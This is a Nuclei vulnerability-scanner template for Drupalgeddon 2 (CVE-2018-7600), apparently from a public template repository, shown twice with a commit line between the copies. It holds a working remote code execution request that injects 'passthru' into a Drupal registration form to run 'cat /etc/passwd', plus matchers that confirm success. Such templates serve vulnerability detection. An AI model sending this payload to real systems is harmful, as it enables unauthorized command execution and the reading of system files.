nuclei-templates/cves/2018/CVE-2018-7600.yaml

id: CVE-2018-7600

info:
  name: Drupal Drupalgeddon 2 RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
  tags: drupal,rce

requests:
  - raw:
      - |
        POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
        Host:  {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: application/json
        Referer:  {{Hostname}}/user/register
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
        Content-Length: 626
        Connection: close

        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#post_render][]"

        passthru
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#type]"

        markup
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#markup]"

        cat /etc/passwd
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="form_id"

        user_register_form
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="_drupal_ajax"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header
        condtion: and
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body
        condtion: and
      - type: status
        status:
          - 200
add CVE-2018-7600 drupal rce 2021-02-15 13:33:33 +00:00			`id: CVE-2018-7600`

			`info:`
			`name: Drupal Drupalgeddon 2 RCE`
			`author: pikpikcu`
			`severity: critical`
			`reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600`
			`tags: drupal,rce`

			`requests:`
			`- raw:`
			`- \|`
			`POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: application/json`
			`Referer: {{Hostname}}/user/register`
			`X-Requested-With: XMLHttpRequest`
			`Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663`
			`Content-Length: 626`
			`Connection: close`

			`-----------------------------99533888113153068481322586663`
			`Content-Disposition: form-data; name="mail[#post_render][]"`

			`passthru`
			`-----------------------------99533888113153068481322586663`
			`Content-Disposition: form-data; name="mail[#type]"`

			`markup`
			`-----------------------------99533888113153068481322586663`
			`Content-Disposition: form-data; name="mail[#markup]"`

			`cat /etc/passwd`
			`-----------------------------99533888113153068481322586663`
			`Content-Disposition: form-data; name="form_id"`

			`user_register_form`
			`-----------------------------99533888113153068481322586663`
			`Content-Disposition: form-data; name="_drupal_ajax"`


			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "application/json"`
			`part: header`
			`condtion: and`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`
			`part: body`
			`condtion: and`
			`- type: status`
			`status:`
			`- 200`